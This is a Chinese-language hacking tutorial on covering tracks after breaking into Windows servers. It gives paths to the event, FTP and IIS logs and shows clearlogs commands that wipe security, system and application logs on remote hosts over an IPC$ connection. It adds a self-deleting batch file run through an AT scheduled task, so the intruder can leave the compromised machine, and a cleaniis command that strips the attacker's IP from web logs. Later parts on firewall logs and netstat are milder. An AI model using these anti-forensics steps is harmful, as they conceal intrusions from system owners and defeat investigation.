清理你入侵後的三個重要痕跡

2021-02-21 剎客網絡科技資訊

清理你入侵後的三個重要痕跡

應用程式日誌

安全日誌

系統日誌

DNS日誌默認位置:%systemroot%system32config,默認文件大小512KB,管理員都會改變這個默認大小。安全日誌文件:%systemroot%system32configSecEvent.EVT

系統日誌文件:%systemroot%system32configSysEvent.EVT

應用程式日誌文件:%systemroot%system32configAppEvent.EVT

FTP日誌默認位置:%systemroot%system32logfilesmsftpsvc1,默認每天一個

WWW日誌默認位置:%systemroot%system32logfilesw3svc1,默認每天一個日誌

以上日誌在註冊表裡的鍵:應用程式日誌,安全日誌,系統日誌,DNS伺服器日誌,

它們這些LOG文件在註冊表中的:

HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog

鑰匙(表示成功)和鎖(表示當用戶在做什麼時被系統停止)。接連四個鎖圖標,表示四次失敗審核,事件類型是帳戶登錄和登錄註銷失敗

怎樣刪除這些日誌:通過上面,得知日誌文件通常有某項服務在後臺保護,除了系統日誌安全日誌應用程式日誌等等,它們的服務是Windos2000的關鍵進程,而且與註冊表文件在一塊,當Windows2000啟動後,啟動服務來保護這些文件,所以很難刪除.

下面就是很難的安全日誌和系統日誌了,守護這些日誌的服務是Event Log,試著停掉它!D:SERVERsystem32LogFilesW3SVC1>net stop eventlog 這項服務無法接受請求的"暫停" 或"停止" 操作。

怎麼清除系統日誌.

怎麼利用工具清除IIS日誌

怎麼清除歷史和cookie

怎麼察看防火牆Blackice的日誌

netstat -an 表示的什麼意思

1.系統日誌 通過手工很難清除. 這裡我們介紹一個工具 clearlog.exe

使用方法:

Usage: clearlogs [\computername] <-app / -sec / -sys>

         -app = 應用程式日誌

         -sec = 安全日誌

         -sys = 系統日誌

a. 可以清除遠程計算機的日誌

** 先用ipc連接上去: net use \ipipc$ 密碼/user:用戶名

** 然後開始清除: 方法  

clearlogs \ip -app 這個是清除遠程計算機的應用程式日誌

clearlogs \ip -sec 這個是清除遠程計算機的安全日誌

clearlogs \ip -sys 這個是清除遠程計算機的系統日誌

b.清除本機日誌: 如果和遠程計算機的不能空連接. 那麼就需要把這個工具傳到遠程計算機上面

   然後清除.   方法:

 

clearlogs   -app 這個是清除遠程計算機的應用程式日誌

clearlogs   -sec 這個是清除遠程計算機的安全日誌

clearlogs   -sys 這個是清除遠程計算機的系統日誌

安全日誌已經被清除.Success: The log has been cleared   成功.

為了更安全一點.同樣你也可以建立一個批處理文件.讓自動清除. 做好批處理文件.然後用at命令建立一個計劃任務. 讓自動運行. 之後你就可以離開你的肉雞了.

例如建立一個 c.bat

rem ============================== 開始

@echo off

clearlogs -app

clearlogs -sec

clearlogs -sys

del clearlogs.exe

del c.bat

exit

rem ============================== 結束

在你的計算機上面測試的時候 可以不要 @echo off   可以顯示出來. 你可以看到結果

第一行表示: 運行時不顯示窗口

第二行表示: 清除應用程式日誌

第三行表示: 清除安全日誌

第四行表示: 清除系統日誌

第五行表示: 刪除 clearlogs.exe 這個工具

第六行表示: 刪除 c.bat 這個批處理文件

第七行表示: 退出

用AT命令. 建立一個計劃任務. 這個命令在原來的教程裡面和雜誌裡面都有. 你可以去看看詳細的使用方法

AT 時間 c:c.bat

之後你就可以安全離開了. 這樣才更安全一點.

2.清除iis日誌:

工具:cleaniis.exe

使用方法:

iisantidote <logfile dir> <ip or string to hide>

iisantidote <logfile dir><ip or string to hide> stop

stop opiton will stop iis before clearing the files and restart it after

<logfile dir> exemple : c:winntsystem32logfilesw3svc1 dont forget the

使用方法解釋:

cleaniis.exe iis日誌存放的路徑 清除參數

什麼意思呢??我來給大家舉個例子吧:

cleaniis c:winntsystem32logfilesw3svc1 192.168.0.1

這個表示清除log中所有此IP(192.168.0.1)地址的訪問記錄.     推薦使用這種方法

cleaniis c:winntsystem32logfilesw3svc1 /shop/admin/

這個表示清除這個目錄裡面的所以的日誌

c:winntsystem32logfilesw3svc1 代表是iis日誌的位置(windows nt/2000) 這個路徑可以改變

c:windowssystem32logfilesw3svc1 代表是iis日誌的位置(windows xp/2003) 這個路徑可以改變

這個測試表示 在日誌裡面沒有這個ip地址.

我們看一下日誌的路徑     再來看一下

我們的ip(192.168.0.1)已經沒有了.

已經全部清空. 同樣這個也可以建立批處理. 方法同上面的那個.

3.清除歷史記錄及運行的日誌:

cleaner.exe

直接運行就可以了.

4.察看blackice的日誌.

這個地方我們可以清除的看到   防火牆的日誌.

這個表示 有人發過來帶有病毒的email附件.   ip是: 220.184.153.116

tcp_probe_other   表示 通過tcp 掃描 或者利用別的和你建立連接 通信

這個表示通過埠 80 掃描iis

病毒 nimda

這裡需要很多的計算機協議知識. 同時也需要對英語有了解

才能更好的分析 如果對英語不好 你可以裝一個金山詞霸.

一般情況下 我們可以 對一些可以不用管.

一般這三種情況 不用去管.

最上面的 critical 這個   可以去關注一下 . 一般是確實有別的計算機掃描或者入侵你的計算機

count 代表次數     intruder 是對方的ip   event 是通過什麼方式(協議) 掃描或者想入侵的

time表示時間

5.

netstat -an 表示什麼意思?

使用這個命令可以察看到和本機的所有的連接.

Proto   Local Address           Foreign Address         State

協議     本地埠及IP位址         遠程埠及IP位址       狀態

LISTENING   監聽狀態   表示等待對方連接

ESTABLISHED   正在連接著.

TCP   協議是TCP

UDP   協議是UDP

TCP     192.168.0.10:1115       61.186.97.54:80         ESTABLISHED

這個表示   利用tcp協議 本機ip(192.168.0.10)通過埠:1115 和遠程ip(61.186.97.54)埠:80連接

80埠 表示   http   就是你在訪問這個網站.

一般情況下遠程ip的埠: 80 21 8000 這個都是正常的. 如果是別的 就可以看一下你的計算機了。 

相關焦點

  • 膠帶作用多但是膠痕不好清理,這些小妙招簡單輕鬆的教你去除痕跡
    膠帶作用多但是膠痕不好清理,這些小妙招簡單輕鬆的教你去除痕跡家庭生活裡會有很多地方使用到膠帶,但是使用完膠帶之後留下的痕跡卻很難清理。而且很多時候這些膠痕清理不掉就會粘上灰塵變成黑乎乎的汙垢,今天就和大家分享一下怎麼去除膠痕。
  • 這幾種方法深度清理不留痕跡!
    微信聊天記錄刪除後進入手機的緩存區域,通過市場上的修復軟體是有概率恢復的,雖然對大多數微信用戶來說是個好消息,因為誤刪聊天記錄常常讓人頭疼不已!但也有一部分用戶同時也有這樣的疑慮:微信聊天記錄是極其隱私的個人數據!如果隱私洩露了,後果將會不堪設想!那有什麼方法可以深度清理不留痕跡呢?小編諮詢了業內專家,給出以下解決方案。
  • 粘膠痕跡難清除?原來是有方法的,教你一招,膠帶痕跡一撕就掉落
    導讀:膠帶是生活中的好幫手,能幫忙固定和粘貼物品,應用非常廣,但是面對撕下後的粘膠痕跡也能輕鬆去除,不要只會用水去清理,大家要了解清楚。各位觀眾老爺大家好,這裡是生活竅門達人,每天給大家分享實用的生活小妙招。
  • 在外「偷吃」後的男人,回家前首先清理的,其實是這些東西
    而通常來說,在外「偷吃」後的男人,回家前首先清理的,其實是這些東西。整理衣著女人都是細節生物,任何事情都逃不過自己的眼睛,尤其是面對這個朝夕相處的男人,他的衣著都是自己準備的,只要有什麼變化,她都能察覺出來。
  • 簡單三個步驟清理油汙、保養麂皮製品
    很多人鞋櫃都會有一雙麂皮鞋,表面呈現磨砂獨特質感的皮革有著它的獨特魅力,總是令人愛不釋手,但很多人卻苦於不知如何保養,今天搭編跟各位分享如何簡單3個步驟保養心愛的麂皮製品!刷除灰塵平時使用或穿著完麂皮製品後,可在清潔前塞入紙張保持形狀,防止物件變形,一方面也可吸收溼氣,如有灰塵或髒汙用牙刷或毛刷刷除表面髒汙即可,另外也有麂皮專用橡皮擦,用來清潔深色刮痕,較頑強的黏性髒汙則可使用生膠製成的麂皮刷刷除。
  • 怎麼清理垃圾?
    手動清理相對於自動清理要稍稍複雜一點,但是也不是非常困難。 其實我個人覺得如果你是一個電腦小白,這些方法如果覺得太複雜就不要操作了,一個不慎很容易導致電腦的使用小問題,這些小問題不會影響你太多的使用,但就是會讓你不舒服,有可能經常莫名其妙的軟體或者文件被刪除了,有時候你手動清理也看不懂刪除的到底是個什麼東西,一不小心刪除了重要文件或者插件就難受了不是!
  • 《怪物獵人世界》三古龍調查痕跡在哪 三古龍調查痕跡位置分享
    《怪物獵人世界》三古龍調查痕跡位置分享,大家一起... 《怪物獵人世界》中的主線會讓玩家調查三隻古龍的痕跡,這些痕跡分布在不同的地圖,由於本作每張地圖都是一整塊,並且地形複雜,所以不是很好找,於是小編就帶來了《怪物獵人世界》三古龍調查痕跡位置分享,大家一起來看看吧。
  • 《腐爛國度2》血心清理完後軍閥任務告密者怎麼做 血心清理完後...
    導 讀 《腐爛國度2》中的血心清理完後就會出現軍閥任務告密者,很多玩家都不太清楚這個任務應該怎麼做,今天小編就給大家帶來玩家
  • 讓你的Mac擺脫卡頓,必裝清理軟體推薦
    電腦運行速度慢,垃圾文件清理不徹底,真是太影響工作啦,不要慌,今天小編給您推薦三款好用的系統清理工具,不僅能優化清理,還可以對系統進行性能檢測,是MAC 系統必不可少的工具,讓你的電腦擺脫卡頓,提升運行速度!
  • 如何清理手機鏡頭—別把你的鏡頭擦壞了!
    二、手機鏡頭劃傷。特別是經常被鑰匙、硬幣等褲兜裡最常出現的硬物劃傷。劃傷是永久性的!三、手機鏡頭上有了油漬或者汗漬。這是最常出現的問題,會影響照片的清晰度,也會影響手機對焦的速度。不過不是一張膜就可以的哦,要記得定期清理下手機的貼膜,換個貼膜。②儘量把手機放在包內保證手機攝像頭的乾淨和清晰度,一定要保證放置手機的地方清潔,不能有硬物。
  • 美國加州「小龍蝦」入侵,泛濫成災,你知道它們是怎麼來的麼?
    美國加州海岸「小龍蝦」入侵,泛濫成災,你知道它們是怎麼來的麼?三四個月沒怎麼出門的你,一定對各種美食期待已久。它屬於外來入侵物種,最早以前是日本由美國引入本土,經過生物遺傳改良之後主要用來處理城市汙水中,及汙水中的重金屬,後來隨著日軍一起入侵中國。它的繁衍能力和生存能力極強。而我們現在吃到的小龍蝦,絕大多數都是人工養殖湖區捕撈的,並沒有傳說中的那麼髒或者攜帶大量重金屬等,當然如果蝦頭的顏色比較深,還是要注意些。
  • 清理你的雪茄刀
    因為他們相信自己信任的品牌雪茄刀既牢固又鋒利,根本不擔心它們會變得遲鈍。然而,不得不接受的事實是,如不保養和注意,再鋒利、好質量的雪茄刀也會變得不如從前。因此,如果你願意花點時間定期清理和保養你的雪茄刀,它的使用壽命將比你想像得還要長。
  • 《鐵線蟲入侵》疫蔓國際 「三萬哥」金烔完亮眼
    12月6日,這部韓國災難巨製《鐵線蟲入侵》即將強勢來襲,這部讓人看後驚魂未定的神奇電影不僅締造了韓國電影的多個神話,還因風靡亞洲的「神話」組合成員——金烔完的加盟頗為養眼。除了電影本身的魅力之外,「三萬哥」金烔完的加盟為影片聚攏了不少人氣。這個在韓國隨便揮一揮手就有一片女生為之傾倒的男人,在亞洲製造了不可計數的神話。作為亞洲最長壽人氣男團——「神話」組合的一員,金烔完憑藉他清澈如水的眼神、稜角分明的「糖果臉」、「7點23分」的標準站姿以及華麗到囂張的聲線,秒殺了全齡層女性觀眾,從妙齡少女到性感辣媽,無不追隨著他的步伐並甘之如飴。
  • LR也能清理CCD,真的?
    我是個懶人,只有在使用小光圈拍攝的時候,才看暴露出來。小光圈的好處就是什麼都很清楚,不僅僅是畫面中的景物細節清晰,連CCD上的那些髒點也變得非常清晰,我平時很少清理CCD,但是畫面上的髒點並不是很多。要是你像我一樣是個懶人,儘量少用小光圈,將光圈開大,可以減少髒點的影響。不過就算是這樣這張還是有辦法,我們在LR中,可以使用清除汙點功能和濾鏡來淨化作品。三樣工具都可以,使用汙點清除工具可以直接對汙點進行選取清除。
  • 過年在家清理電腦,只需這三步!讓老電腦立刻變快速
    相信許多朋友回家打開電腦後,都被滿屏幕的電腦管家,電腦助手驚呆了,這些程序平日裡就是在竊取我們的電腦資源,由於家裡的親人沒有形成良好的電腦使用習慣,就會導致這樣的事情發生。其實只需三步,就能讓老電腦清清爽爽。首先,打開控制面板,將這些流氓軟體通通卸載,請出我們的電腦。如果碰到了頑固分子,可以下載 total uninstall 這款軟體,對頑固分子實現定點清除,完全清理掉他在電腦中留下的痕跡。
  • 再不知道應該這樣清理電腦使用痕跡就「危險」啦!
    雁過留痕······優質的青年平時用電腦時難免會有這樣那樣的小秘密不想被知道 尤其被查「記錄」時總是膽顫心驚怎麼清理電腦能保證個人隱私不被洩露呢操作步驟如下:第一步:點擊右上方三點,找到收藏夾,點擊管理收藏夾。第二步:點擊下方圖片處三點,可以選擇將收藏夾導出,導出的收藏夾默認HTML文件類型。這樣之前所有收藏過的網絡地址就可以全部保存出來啦,之後使用新電腦可以直接將HTML文件一 鍵導入。
  • 軟體|卸載軟體、清理文件,你只需Revo Uninstaller Pro
    今天就給大家分享一款超級強大的軟體管理程序,Revo Uninstaller Pro,當然分享的是自帶註冊程序的版本,免費供你使用。Revo Uninstaller Pro,可能使用的人不多,但使用過的都知道它的強大,它不僅可以強力卸載軟體、清理殘餘文件和註冊表文件,並且自帶多種工具,如啟動項管理、垃圾文件清理、歷史清理、使用痕跡清理、永久刪除、備份管理等等。
  • 別讓鳥糞傷害你和愛車 怎樣清理鳥糞
    這對於各位車主尤其重要,因為清理車身上的鳥糞是很多車主經常遇到的事,那麼在這個特殊狀況下,我們又應該怎麼辦呢? 疑問:鳥糞是否攜帶著病毒? 近期微博上流傳的這樣一條消息,大概意思是開車的朋友要注意鳥糞。如果車窗、門把手上有鳥糞千萬別碰,鳥糞可能會攜帶禽流感病毒,如果接觸會有感染H7N9禽流感病毒的風險。
  • 選擇用具和清理加工很重要
    山娃用實際經驗來給你作出分析。油漆鐵桶可以用來誘蜂嗎?油漆鐵通能不能作為誘蜂桶使用,主要在於誘蜂人對油漆鐵通的處理,都知道蜜蜂對刺激的異味非常敏感,不利於蜜蜂生存,油漆鐵通必定裝過油漆,油漆的氣味想必都不陌生,別說是蜜蜂,就算是人都受不了,所以用來誘蜂,必須清理非常乾淨,稍有殘留的異味,都不可能誘來蜜蜂入住。
  • 判斷男人對你是否真心,這些「痕跡」很重要,別犯傻
    不要執著於一個不愛你的人。」誠然,愛情是需要緣分的,最近重溫經典《半生緣》,顧曼禎一句「世均,我們只是回不去了」,讓人感受到無盡的苦澀與酸楚,有情人不能成為眷屬,是非常可悲的事情。感情終究是兩個人的事情,你情我願,彼此吸引,相互付出才能好好在一起。